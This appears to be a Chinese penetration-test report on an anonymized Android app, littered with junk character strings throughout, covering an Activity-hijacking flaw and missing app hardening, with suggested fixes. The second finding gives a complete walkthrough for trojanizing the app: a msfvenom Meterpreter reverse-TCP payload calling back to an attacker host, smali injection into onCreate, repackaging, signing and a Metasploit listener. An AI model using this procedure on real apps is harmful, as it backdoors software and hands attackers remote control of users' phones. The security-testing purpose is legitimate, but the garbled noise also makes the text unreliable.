表1-2 测试结果 % i- C$ _9 |, D
. H. e+ [& k; K. T
$ g+ w0 ]( v: g9 i- S' Q e0 O5 {
# L9 h; u/ y. d: ?1 X
& h7 n: D) c0 @" M; ]
& p9 @9 h6 K; c' @6 m3 |5 t1 C ( l7 }0 y, i$ `4 `, A2 _3 _$ I
4 V3 \9 V0 q4 V7 o g- v" J5 v: Y1 B( z
j; R' I; Y8 F$ w- S, m: R6 j8 b! B
+ j; {# L1 }" {
2 u, A" X: t' z( Z
; j0 G, D7 F( ^/ P0 f* ?; v 2 检测结果
* \. s |5 U% ~* t# }/ ]
# ~8 m; g" h" ?" r2 b
6 `1 h/ [% v/ R1 i# G. Y* P0 r
. \; p4 P% L" S$ |7 N% h
/ b9 W0 |2 \# s: b' C3 e) {- j }3 h. T! z2 V
2.1 某某某
. T( S" t% [0 I. o# p+ ?% p
* {1 e4 ~ N) d6 H
$ I' @; N$ u0 B/ A) m, I! Q1 d
2 J+ g7 G# t( Q% ]9 I
7 p# z. K" n9 m" g. O
5 h: `7 c: E4 {' e 2.1.1检测目标
2 r D& ]( r( v, L; L+ ~7 {; `* w2 c1 L
* r! l* G, x5 o& ~, b. b6 d6 o. N1 B! l5 q, B
% ^: t& I1 y- h* a0 d
1 {* ?, L: Z5 C7 v# Z$ ?; Q8 k
目标地址: 某某某某某某APP 6 K# t; F* n! L! Q2 g5 o
9 }. t, S6 D I6 o+ I
/ l' X8 T9 r! m7 A) g r9 C. e+ l& e, p% t
+ ^7 O! z w7 K. X9 G* T) T; a7 q' l4 J0 G' @9 G
2.1.2检测结果 ( j0 M- `2 E6 w) |& a/ x
m: D N W* S+ R- d
. k0 C. y/ [, g- w
6 g" d3 X. i5 @6 R5 O7 |% q
3 b/ r% i0 z9 w/ t' Y- r' K3 a5 b8 ~: p, ~" O! p
2.1.2.1 7 G0 Y$ u0 p6 `/ C% u5 Z0 ?
3 c# P3 {9 O o0 K0 |! R, l- j1 n
- \2 F, s5 t3 I+ K2 _! n4 l2 P
# ]7 n' H6 n2 c [2 l. q: A
% l% b% r' a, A2 I
& D: s9 v8 G- n* n. B6 Z2 L 漏洞链接地址:某某某某某某APP
: W" `1 A( Q, Z2 p! }& C# X8 o5 O& ^9 M1 H! [% k' E. {
2 ]; ]; P8 J4 C2 S% d1 W6 \
& M. r# n6 n* h- {& t; p
s9 x) }# j0 s9 \
% c% c% X9 K7 r3 S$ r
! w B4 i5 c0 e3 x0 ]$ t( M4 S* W7 Y, b- z3 p
0 R8 {+ Y; P* q% O* q) j/ F0 z
- l- z/ O( g2 b4 G* s; l
* P# E" d! h0 ?( p/ F6 I
: a8 Q' t0 y( p- ]2 V& P
漏洞分析及取证: 7 M9 p" c8 j7 H; T$ e: u p
7 \) n2 _8 r0 F; N
% r: Z; u6 h+ I& D3 v8 G/ L- P, X0 T
/ }+ a* J! Y8 @% E/ a5 z0 l |3 O
2 F% v7 A: _* E8 m* ]/ y3 j( o& b! U" k; ?2 B& M
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 3 i3 J% Q9 p, J( V8 n
, G, U* t% m# b& k
6 j4 Q2 @6 [+ R" J9 Q& w
9 O z% B% x8 |$ j: D
$ d$ F3 }* e" \1 |3 c$ ]
$ a7 }: D- y W
% C \. z) a$ q/ x& \2 ]4 f F- X- M$ }/ T! ?# R u' X1 h; v
$ ^% o& ^; z1 v0 ]/ X0 H$ E; j: L% [% {; U: V+ i K# t
) B L* s4 c$ Q0 i2 C' m
0 M3 ]: I. r9 v& i ! Y; F7 k, W4 B2 G2 u3 g. z- P
& x& T* p. W" A* L
, L1 \3 D2 T4 b1 J0 q1 E/ M# X! M" I/ V! C" l1 L
?" l- B/ f1 G7 L, o
; A) G+ O5 N3 q
0 `( `! u( |2 Z# Y! x
* I' h' [, m$ ?; C7 Q
6 C6 P, H& p1 c& t( H! \! E: m( z% U7 X" m: H+ j
3 v: t" E+ V* k. {
2 M, t& } ?5 v9 O& x* ?7 n
, ` a; V0 u8 N+ V6 [
( ]* H) F$ L T3 O! t' \+ ?
4 I( ^3 n4 Y7 \8 S7 b" L! X2 I8 O3 L, X+ k! B
. r3 R- b; P& `
+ m8 q1 t; I* ~6 e7 j3 |
( q7 e) [! `" P, h r6 N( P6 Q/ J9 f' t$ y: m
" C- x% J$ a7 B2 B( `
$ T2 D4 W! F, H6 @2 X
+ d# L$ [" X; D2 R0 S$ J
' H/ [) C7 n% p) \: s 漏洞危害:高
* h: Z- h# m6 ?9 ^1 B: p* P0 \+ b* b( u+ @) E) w
/ _: L, q: w/ u4 b# s1 Z% N7 j$ E
1 p, m$ G+ Z0 K8 M* I
7 W6 ~& Q* d4 |3 w+ k7 J9 m; x$ u+ z7 ^4 d" O2 V
! n8 N- p7 `$ K, O( k) s: E
5 {- V3 m! K7 q; r) W # H* p X1 p. K
+ p- N' z3 P4 x/ Y4 m8 x4 W$ M b
* ~/ U- D0 k; j
8 l& G/ M( t+ i
; a3 n( A0 C& R$ `& z ` H" S, w5 D
3 r" J. L0 T, R! i1 j3 f$ S+ O6 Q; G0 W( V. o
严重程度 5 _1 h+ g0 v$ X9 d, m
' m5 a" ^8 y9 ~" d
4 ~: |* I% A, C2 G0 X w) ]
# H$ d4 {9 a4 d& O& E: u: }5 j |
- a+ y1 {6 F0 d, J
/ [' T. u8 G: k6 b( @3 u 2 F3 C- E4 l' C
& D) @; t$ s9 M9 D ) T5 m0 C1 n4 W p6 m3 P
9 ~: d* j) ~1 a9 O
高 $ F |# [! U- {* n$ g4 D& J. D
& A" A: R# y+ K; R7 T- r0 O
' ^5 O9 d% A9 U1 t* c* M8 V+ f
0 s( `' C& {& g) S- B | # W a8 i$ i7 s8 I
0 ~; r, z' @. m+ I3 f
$ v" X; A+ x, @+ v; }8 I& r7 C" D1 b* v4 L- M
3 v. i4 h2 c; }7 z/ j1 \
2 b! I1 I P; D7 S4 ~% b( ~$ `
■ # H0 j" z% m) r) s+ }8 q7 X4 b. U
. s( t" u- V3 r
0 t& d7 n4 P+ I0 I5 P' Z. g: ?6 @
- u$ G- s! Q, Q8 \4 h) B: C
| ! o! Q4 o: |' ]5 k) g7 x
1 V0 i' E, H9 M& ?7 M G- o: \% V; q / w3 N$ E4 z$ P! d
( r' D/ W! [' u% |/ q: F
# G% y) G& |: V8 U8 e/ F4 V* w- p6 `# \
中
/ c1 ^9 `1 @) l2 T6 l$ O0 H7 |6 E0 o5 k" I
. N$ Q% g3 ^7 q7 }6 j1 N
. t" z0 T1 S @" h5 l8 p
| , K2 I3 M5 D: b2 e! \
# v# [+ ?* \4 u6 `
6 `" X4 t! B0 C# h; X0 `& H
1 D, t. Q2 {( Y, u
. j2 Q" R; y4 S( L, S: u5 x4 u$ Q$ p' e" d: C+ k( f; }) o6 N
" ]/ C( `. e: C' @7 _8 L: F0 H( w+ C
4 l5 q8 c3 t7 w
! n6 ?, r; P3 y# u, s" S | , I2 J* ]7 v: i- [% k* t4 `3 j
' L0 n8 h o( o* ?0 U * o* y a% y* n. e. @
$ J7 ?0 o E: ]. M
) J; `8 R- n6 R8 w, ^* F+ u; i- Y# {9 C) o% I+ N: r
低
8 K; x! e) q# _8 D& U9 Y0 t5 a' x" ~: Y* Z
+ W3 `/ I% l5 \. f1 ~
+ w9 L' I! W" c/ f j* i: x+ M/ { |
) U7 c+ [9 A$ e7 O' Y5 \7 X9 H7 k" h4 [+ ^& Z1 I5 Y
0 u5 ~7 s! X3 Q4 _0 F
H4 z% z3 d" m8 \: y2 D; d2 \ $ A3 M2 D. x/ o5 |7 l/ I6 p
6 I3 Z6 `# R& g- ]( i
* G! m0 W# ?" y* Y: V6 [
9 {2 n! l6 ]' e4 G( J0 v/ l/ U8 U % i9 o3 r. I0 |- o/ i0 |7 f8 h
: w9 c8 O2 V1 p4 e% ^9 H. ^
| 8 T7 `/ D3 L" e( I$ Q. A' d
, V5 I$ N; H( `# U, V& i& W% R
7 q2 d6 \, H! V# T( \
1 N6 p$ e- z g. `+ ?
) Z; j2 w$ Y8 x5 ~/ Q
% `! j0 f5 u8 \2 G* L$ e& C
o% P8 H% v, q( b/ c
- Y9 v5 ]) C m! G7 M4 b
# J. [) g7 E7 Y& T _* y- H$ Y8 Y& [, K
8 S9 a" ]$ d/ w0 L7 R
# c. [6 [0 g9 i0 V0 x
; z" n/ Q% W( n+ Q4 z+ G
& |3 w/ I: z1 h, [1 L# s; X
7 F* g( a: T3 ~4 j: A; S2 c. a
_, I- V: b P8 v! V
9 Y7 b! N3 v/ {" x0 }
5 X1 E* t: M) K8 l7 x+ O 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 : `" M- j; J) s* d
% F# D9 t! F7 g: H1 m/ E# i9 ]2 N
2 x( A+ T! G! R# J1 V" Q! {6 t2 ~# x2 e9 Q% ^! b
; E! H( j+ ~* ^/ \" G/ c
1 d1 U+ H5 ?% w( ]: ]+ c) B
& u- i, S+ X2 J3 k! _
3 D% D' v% \+ C% L
. U4 z4 {/ ^0 x! M0 g% T: Q
- S' p2 k" W4 r/ r0 o! O" n & c( x# I' H8 u; s
9 V$ r1 ?- B) g& ^
- N0 a# d0 t8 L. R- ~' e) F3 e* T" n3 i# t. u
; E5 ?( e; }, L/ |- h2 ]
( c% Y1 b, }+ f9 z0 q f* P2 O) n& A( E
% j# ~/ Q1 m+ R* ]
2.1.2.2 # h4 \5 ^2 Y: n/ k" r; Z/ \
) X- j ` P2 U3 v2 r7 U
4 t2 J+ K9 V8 E4 F6 w6 F
/ b+ Q. {6 V$ |/ G) b3 C" d0 J 4 {6 ^* K6 J5 V A' G% Z
8 G3 r$ [1 ?8 T2 ~* p 漏洞链接地址:某某某某某某APP & b: n/ m* ~1 J
% L% w; p0 ^, \8 j. {
1 ?% b1 ~- K7 @/ E+ W
* a' E4 d! Y, h
8 O( T& |/ v2 R# I: k
+ ]9 j5 ?6 n0 y, T" G0 p5 C" Q- z( G 漏洞分析及取证: , A" R" Z- `! @2 Z( N2 v
# f* W0 B, q% y$ j/ l4 j
5 h3 O# }; Y7 E0 L2 v3 P- I7 O* G
9 Z% y* b; f% `! M5 b
0 H6 _$ Y+ D) ]+ `% k1 }
1 E2 d" d6 b) _% y 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
# ?4 p( v9 B- b9 ] n9 \( w) f* U1 G8 |& @5 G% z# b% e4 J
8 s0 D, J. C0 P4 p2 n8 f' M+ G1 B! |- C# [' I
& }; f' f P3 N
) k/ B* }1 i2 B4 Y' g 用Metasploit 生成木马 apk : Y" U+ E. J; H- T4 v1 ]
+ {- T' U# w- {
& a# w$ N4 h! T' ?3 z3 h
6 y8 T6 ~0 U* B. q) w: u# d. [
5 C) |! w% c# T* d o* x, B3 h' h
' i4 W' n9 c R/ Q msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 7 c/ y) c( X/ ?; }3 A
4 w4 [ N% q3 y7 U
) [7 j( R1 O q! Z% F7 [ J8 p
j* {8 k) M6 `) O' ~ 3 T: Z& `2 x% f4 A1 j. O
: B3 y' m9 j8 W, s. X, Q, i
反编译目标apk和木马apk 7 x' H& i0 I% L' h% [/ Y
+ W" }. A5 _% o
4 s B% J3 L2 P! b8 }$ G( m, ^
# D# L$ A6 }$ P- _/ |5 h
* M4 d- |) C! |- B# a/ F
, ?" B& q9 A: R3 q apktool d target.apk
; S4 U7 g! b$ y I8 o& Y0 N$ K
( K/ @) ~# b" R3 L/ z; o apktool d cockhorse.apk
* I& `; X9 X% f. j
. J0 r; R, J5 f& s# g9 B+ d/ W
3 a0 W% B! `7 v C/ {$ A' j) h
) y0 v3 n1 n2 p" }' E- f. C
6 |9 q! _, a- @
% `; J3 K& D8 m6 O( u5 c% J( |8 ^ 木马 apk 注入目标 apk . H% r9 m* |, d( e- z. Q5 X
' K. e( P8 B2 K+ d) ^0 _0 p1 s
" s3 |8 {) `0 a3 N) R+ U1 g
# v1 O/ H/ }* Y( ^$ P . S0 n, D. ?4 I- b: A0 r
1 O; |) I: A4 F4 b 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
7 h5 }6 C! ?% K$ m% F# }. f. m! r
0 B, Q- @* [- g9 P3 V
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 3 Y! Q# [% g) ]' m' m0 g. W
& l( b, n# z$ R! ^4 Z/ |
% r5 B7 `# B# Q+ G6 g
' _ }% |! O& T: R2 r ' A7 [* a9 J' }8 m7 c( Y
3 f1 @- E( q" E) Y
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 8 g" S7 m* x* ?( ?) m
1 e9 d$ {" Q6 B9 t) Z( ~& c
5 S* w7 K0 ~* N* F* i$ }
) |8 `! d2 X' G8 q; F k3 y; [, m3 @5 s" i
* q# t8 ~/ X% ~& O1 D) j
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 # f) O+ J8 y1 g$ H. p, a; m& w6 R
/ x" k# K4 h( C, q7 D
) J1 r5 [& ^' x7 K3 Q" k* `
- n4 B3 c( x, E9 ?6 d5 [4 T& y 7 D" S0 ~1 l4 n# w$ f) M! g
3 c# r; Z9 P& Z$ w( F. \1 A
回编译生成最终 apk $ Z; F: v4 b2 U3 {
) g1 O8 F Y1 _! _( _# G$ {
5 o& H! u. g$ L7 j' S# W: @: K& E0 c
+ S. h! h5 ~0 q; W( z+ U1 i
8 U) w% X4 N+ o) Z; ^. R/ W 重新打包
4 q' }( d- O: @! Y6 V I, r: n4 _5 |9 u) L
e' I6 j- ~2 A
, {" Y" X8 l/ d4 Z 2 b, v. u$ x& A) Z% @
- H6 j- A% M6 c
apktool b -o repackage.apk target_app_floder
" }9 u+ f0 r/ o. [8 }8 N( t4 x. t, Q, r. l4 J4 @
$ W( D- K& e2 o* Q; V7 @& {
& U: T. Y7 U' \$ J, w ) x+ [! V7 r, |% |
6 z/ ~9 ]' E9 t* w' ?; w 创建签名文件,有的话可忽略此步骤
1 N0 R, e4 @$ J& P& N
% G: ]0 @, ^- A
5 l0 ]( B: @/ h, s& M
0 Y% M" L. J5 r
! T/ T$ U; W3 G/ c ?. ~9 ~
6 Y4 i3 t! U- k3 I; G keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
' b- @6 u" \8 i" d# F1 |; U- E( z
- @5 O2 y: N% W$ i6 K9 E
- S' u+ e6 j7 I0 e& b+ i# H' O, y/ r
- n5 m8 E9 Z8 Z' a' {, U3 I8 H
! c9 |; V4 g; e' a$ g- W9 D& V 签名,以下任选其一
7 a+ q, {2 `) I J2 s$ m
# t8 m6 c6 f* I% K! m
7 D+ A6 w, h- Y2 o: `8 B8 _' Z
8 ~! l+ e7 @4 w- F {- N5 [1 H& }; B
) s: _3 e2 h* F- J
; f+ J/ B$ m# ~% Z jarsigner 方式 & o$ C5 ]5 r. p! z
. u3 n/ y, h5 K7 {* K' ~
4 ~ Q7 O1 p: {5 K3 p2 D) _
4 K5 z7 Q! {( ^- f9 d 5 \& }5 }5 M( b h; {# u( W1 k/ I
# z) s" F- `$ k
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 1 k) A' c. t( _/ Y+ {
$ t% v- W- o! X
# g- O: l) I0 [4 W8 s, o6 Q5 j8 b/ z G. `+ `
5 t# o6 L L. `7 R& w" B% [
# W) U s3 F0 J O apksigner 方式
0 i$ u( \/ ]" }0 t" a' {1 P2 J) @0 E h4 u/ R' D- K
+ f7 m* E. }' p" {8 m
- J/ _ A7 \# Y! i0 K% ^( p
$ V& Z: G1 o$ X3 J- `2 y7 I: v/ s# K" f8 x" u
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
\2 N: ?& F& r2 M: N8 ^: \0 Q- O: a9 t) ~
7 w) S: f6 }: |' A+ ?/ y
" M) L$ A6 H/ r2 r5 t& J* s
3 _. s9 p* ^6 Q3 D- M9 F7 L" f1 Q( q
如需要禁用 v2签名 添加选项--v2-signing-enabled false
/ ^. L! s) j2 m4 f5 @
: u" a. s: u2 H0 I
+ I$ z3 y% }1 D9 o
7 x' N7 r9 K j/ d$ Q9 t- b
7 Z" r* L3 A# V6 n5 F: W
2 S- l$ Z. H4 T9 w 验证,以下任选其一 3 P8 g; w% A* d$ ^) n A
7 R8 D, ?$ p' g7 k( [/ x2 d
- z' K& M/ o+ {/ ^5 |7 W" v) |
0 \9 A4 Q, A5 W4 m3 H - e/ g5 _4 z, m8 Y& \1 v3 o
; a4 @0 O; b2 p5 S/ i! z. @
jarsigner方式
7 q) u" |6 P2 F( B) J" Z7 t8 e& k; t; F# o5 g! d) e+ d0 A i
5 L/ e( z0 n M$ E5 J7 O
! E& n! I; v: Z0 W, D W5 i. O
- I4 O( v0 u$ y7 ^3 R$ v( F
0 E1 J2 ~# C3 u7 {+ i" q+ J4 }) K jarsigner -verify repackaged.apk 1 x; q5 p/ q4 ~2 u9 B/ P! G
% C& O8 a$ G5 P% F! r
1 r7 p% i" r5 A4 r, S, k9 Y
) t9 i8 a$ \. _ F9 f$ P k: t$ q, C; k2 R' \9 L, e
+ V* c2 h! u0 S! q% b" A/ N
apksigner 方式 5 t, e: e0 X( u& Y0 z2 J3 Z# @
( d( F# K( g I) K# R5 u( ?
* |4 ^1 X5 H: X& \7 O# ?9 k
& X# ~1 y2 ?* [9 W+ a
% V! k; m/ ]) [! f y! U7 b! I. L
apksigner verify -v --print-certs repackaged.apk
( g! s# N; P- p: u
. C' V" m* }% [
5 x( }: v2 \* S/ k# U/ q5 u+ @) u' z8 S- i+ I
2 f$ q L7 k5 B, f+ O; K6 y2 J
@0 u @# R7 N+ [4 @1 I keytool方式
% N$ t0 j! J7 j: I1 k) \) O% p% V
" T4 m7 `4 i8 v: n9 U3 I
3 S9 m9 ^9 T* C& Z) l2 ^7 _. u
8 s- ^% {. |9 }; V
/ \( c: E+ `) g5 h
$ P5 H, ]* ~- S% P2 B0 g keytool -printcert -jarfile repackaged.apk
v1 |- H' f8 @9 G ~1 `. _$ r+ J6 v% n4 x4 ^" g0 M4 @
' S! J B5 y, R- j
2 `. _% W& X- h( b7 L/ g( o " n5 A3 R; K$ X' }! X
; @* @* _$ T# m' R+ i2 |( y
对齐
& f7 V- L, q! J* T
# k( F7 G( j3 n8 z- w
$ \, w8 M' B9 j U6 N U# e
. b' E/ r# }; v* J+ Q2 q
4 Q6 i; U" e' l* A# t/ y7 A: F, C7 j; k; Z; N
字节对齐优化
: K* z. n' c& W, ~. u {$ n1 ^$ l7 C5 j* G0 h5 `
6 b& F3 u t2 l" h$ D, R
! ]- O' s0 N; ~8 y4 R0 r 4 Y Y8 L( D0 H2 n# e. R1 D
, r+ l6 n6 G1 |' b, b$ d
zipalign -v 4 repackaged.apk final.apk / Q& B3 P% K* h4 E5 P( x% y9 G4 b
_: O% G$ C, o: O3 o1 V* }4 R
# D3 U- R7 m g
# M( b1 a! }/ E( q4 u, J: x n9 R# v+ L2 J1 u0 t4 s* \
7 j# e; `6 @% ^/ A: X u 检查是否对齐 9 b, m9 B2 M4 x9 ]( |
3 Y: s9 y' S! I# H5 s6 `1 a
7 h! k2 Y v. x/ o( |0 s! k- ]4 U! E8 E0 n
& w" Q9 F3 R1 C' p+ I* m0 G% D7 N3 g4 N T5 V* b# V- }6 M/ z. e+ }4 B' O
zipalign -c -v 4 final.apk
" Z) G9 C4 S6 i$ q0 ^; z O7 v6 X: ~+ z. @2 }% x$ A4 s6 V
" U J* g# ?4 P4 E+ P
8 Q3 |& f3 W i
2 u) _2 N+ y6 a) I6 n0 H
R* E) H2 A4 F R6 ^% I
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
* @- D* D& L2 Q' i$ \; Y4 S g" [+ Z
9 Z3 U1 J- Z, \; S& w6 z% Q8 j! t l6 {$ \% w' ?0 [0 A. A
2 G" n B- |$ u
' K7 w: @3 I5 V3 J' M 启动Metasploit控制台,配置参数等待上线
v, J" [& v& B/ c& w$ ^7 t
% F0 j; y* F" v1 [' A7 {
( ^$ p. m! o; O9 ~
$ U6 V* O0 a. E8 Q! G0 a. d; P
$ d. ^' x! b2 p" \% M0 y
: E* W( u* L% }3 n. h1 b/ V 在终端依次输入如下命令 ; n% i4 W# H" D! R# N7 l
- H8 b$ |/ R# W9 h
$ C$ s! V8 Z0 e3 o! [- f0 E
( ^- _/ ?8 N9 V ' i+ h2 T. }8 n
8 M0 l0 M0 l, k; g9 W msfconsole
. i9 m! `/ c# m7 P. ~& k# p4 Y, }: N
" w. F/ h4 s. F
4 F+ U) b+ B6 n3 n) Y: R
# l2 K" ~9 c: s4 k
$ I% ?7 [/ d# _) A use exploit/multi/handler 1 |" O1 P/ y; A1 s6 Q
4 S" R# m4 y2 |% D* L$ b
+ Z5 D6 P% g- `! H: N. K+ O
1 M) ?1 F, R- X2 n/ ?; ^6 J, t
' S" k) j ?- z! e# S' B
! m. |1 x& z x8 ~3 A set PAYLOAD android/meterpreter/reverse_tcp
3 m. s) q) T J) E& N4 A& }$ J: y( F6 G+ g5 i. @, q) r" g6 B
8 c% K, C8 |* p8 @
1 q# m [0 j3 f5 r& P
# J4 A; `$ t" J4 `0 ?, c% G+ {* B9 w8 V
set LHOST 192.xxx.xx.xx
" j" t- B' n- x( G9 F: q ~ w3 M. l6 p4 ~3 V
& f" C8 ]6 E$ c' Q0 M: X
, f7 o1 E* O" O2 D
1 ^8 `4 u- a- W
: L: w3 ^- d/ t f set LPORT 4444 + l$ z! _0 d# i4 \5 Y3 t' v
( F9 I! ~ T1 T3 e5 t
# S/ [/ f* I& K8 v* D; v& h
" t) G9 W( n( C9 x- ?2 f
0 H2 @3 J% S5 H' S4 t8 a& d0 p; V0 o
2 K7 o; i* d: R2 G6 B
exploit * S4 |" F/ F( H( r' w: ~4 n
( n! x9 L& k' Q: T7 i6 ~; S9 L8 b
& u) t3 S: n) L1 b7 y# |5 ` _1 N0 {5 `) S. f. W: l4 V9 E$ C P
( p2 E% Z# a, | ?' u3 `
* {; O! `& }4 a# Z 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
- X# a5 \7 S, p5 [1 k
# l- ^6 N! ~5 r* e/ K! k- @
9 S, z6 }6 B# a' C+ W- j) S! S3 r
9 u" R0 n0 M! K' }
2 ~- i0 p# \9 G1 Q# c4 a 漏洞危害:中
, }8 R1 @+ y' `( @, x& v* ]" j6 X
) e B3 [5 O* l6 ?* D1 r& j5 T7 i* ^$ ~1 J; }5 q& h8 h. d
- ]7 y% }2 `! x4 U# A8 _- a
) P) ]; Y7 V3 S# O" z7 x. G) X
- Z E5 f: J8 U+ L% H y' Q$ M: ?' z8 i
9 P' o! k. H: m8 `7 l
$ a! [7 |% ] Y+ L, A8 O
9 P% K' E+ j* S8 W# Y
+ [6 N0 ^3 H. O! E* U
& t! Y( m. Y" s2 |
2 L+ S+ d O' r6 F
: b8 M2 ~$ Z3 L' o0 f; m; Q( t9 N- j' {" t
# \3 ^, R# G, s/ g
" w- e" x; u, C" z2 A4 o. Y$ F
严重程度
8 o; M P; J: q# Z% B: ? Y+ y' A
% w' z) L/ w: d; E! s
$ {5 O g2 j }* v4 U+ [
- o* r# u$ `, v/ G/ O( Q: | |
: c/ n" L+ b7 R' T4 Y$ h2 Q3 e+ s' u9 }2 j, l
8 J# I$ D3 _( h
( ^6 a9 r- W7 {& Z9 Q0 v
4 t- s) u- }( t- F! `/ E' r
% Y9 P; _+ l7 {% A7 L 高 3 I3 ~5 L" m5 n0 c0 w
+ z* Y+ \# h& y6 I
0 m/ J- U: S" w0 B8 i! V1 A6 X$ P, V1 A4 ^7 X
| / u5 e; U7 |) |3 y7 q& ^
2 m( H* J' v, e" _0 c+ i9 W
) J0 I: l ~3 u9 ^4 R# I0 q. a
4 O1 v+ h; b# y+ W1 z6 H
- d0 X- g4 U$ `; B9 I* c ]# M7 D% {) b3 _2 ^& v; F1 e; H
■
5 d \7 M; w3 ~
* u0 E6 u% Z+ ` M! f+ u
( L5 n* @; D: U8 G. }7 B4 e+ j v3 \/ _7 ^' l9 y
| 1 N5 } ~. j. X' S% D
# v/ M8 f8 Y i" c8 Y0 e
" f8 G1 [; |( h
" X! C6 I. S- Z. d5 z% H
, u1 R2 D3 ~" y% G# W2 r$ G; i2 O2 h% g4 X* K+ a5 ?; a& N
中
# R7 R: l: ?% q; N9 ]$ o' N# U0 |* k9 p {. H
3 q( M; _: n$ a f1 X6 `7 I+ [& X
- p3 e k4 {. B% Z6 |2 F |
9 H, |/ h& Q# T" w4 ]8 B, p- ]% I$ p$ S) F1 E4 s
/ V5 T4 `6 C) U v0 ?2 n" m8 Y: f( r5 i3 z; ] D
7 q% s/ x1 i' v0 S* w M7 n% [7 f% a+ K
6 |& H3 z* Z1 }9 Z3 l- Y* g, G
5 a0 u( d M6 L" D/ l
/ v( X" s) F2 N5 Z M8 o2 F# b7 M
' _: J( g z& R m
7 X" n B5 `# K, s) d
| 5 E1 n. f* f: Y
# Z' a4 v' _. p, |0 t2 I$ J* @' Y
8 w5 x* x& `8 x5 Y9 d1 B1 P
/ C5 J) E S2 Y+ q/ T# V
- ^( U5 F N8 B% p! F
5 R) i* D' u% I& N+ R 低
% C# D; W7 T3 p0 }9 y3 C$ e$ [. K+ S5 w+ A
/ i! s% L# T. m4 g
8 z' @: `! r8 s* K I |
; ~4 t! N; O2 R3 { C" Z
. w0 W2 |" S. S" J
7 Y' Z* X8 D1 h& n
( f4 G* w3 R& X: t5 G " P; F2 b3 u: W! Z( d
1 I* r/ S8 M) I
) V- w. c, J* m7 h/ a& b7 e3 V4 n2 D9 @9 `
; v* C; t3 ?0 e# I- {
7 T, L( b2 ]0 s! s5 c5 C 6 j' v) E. d& k; |: K# J
+ U# o8 ^) i M4 @. W6 g8 P0 l | / o7 Z( D5 L3 k
p! i: z( _* \1 l) {7 n
6 i& M6 O0 h% Q" ?. X$ l2 G0 |# @) ?8 Q; Z. v* T1 d
) o; f$ d8 \# K% v _" K6 J/ I
( L) x# v) F5 E9 L, C; f+ ?
& F: y6 u9 G+ d/ n. F+ |8 A9 S, t% N2 x2 a4 o3 f- s) o* m6 g
; w( J- d. H, v, y8 F
& ~. ^/ `0 U7 w& @. C9 I
) }9 K/ i6 f8 f3 c0 K7 H9 i, C$ U4 P1 _! Y; h% F
V0 t7 F! `3 K/ F; B! e9 @
0 |/ V p2 d: d+ @* B
+ G ]6 I! z3 c3 A$ R5 e0 S* k, o. z9 ^
3 q2 \/ Z& }1 S: n) f' n. p, }. ?' e/ f- m/ {1 H' n
修复方法: / P# K) w: z. z1 `# A, R
$ k# p# ], c; r v7 i# u$ k
' y: b) o; G0 c7 A
. F5 O6 ] ~, U: B9 {7 I3 z
8 n+ ?0 n- A4 V
% s4 {) i+ t1 s; R ? 1.在 APP 启动时应做签名校验防止二次打包。
; ]. m& U5 C+ W" ?% ^5 q9 c& h
e2 w9 C$ e! J: q7 G3 h2 y
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
( H1 g' ]2 O, ~/ g: x' ^; F8 i2 m& X+ W( i- z' |& j! X
) t5 Y- I7 |, ]0 O
& J# B5 d& }5 V. o
6 }. b5 Y+ @; K: i. q
9 W3 S. t/ F1 H {1 R- q. I) O' |
S# E# a- A6 C& e
1 P2 Z( i: t7 o3 Y$ b
6 {$ o6 e+ f7 _: C( _1 w$ v" e$ ], p' J% y
5 l( U' q* l8 @- N9 }. R" Z4 e
9 o6 l7 g2 U+ f- T7 L$ V3 y* U% k9 Y 2 ~. E. ]; C/ J+ h
" [* `5 }! G2 D" [( i
, r/ C/ H) L. m5 ? J0 w" S. o3 |
6 s: F7 Q$ ]8 H3 ?8 _5 \
5 P: s% g& U3 I* K9 z; c2 Q
4 ?9 I1 r( f( {) a+ w6 j7 h- D
8 K u+ Y8 E+ O3 R7 p
; b0 Z$ v! c/ A' e8 D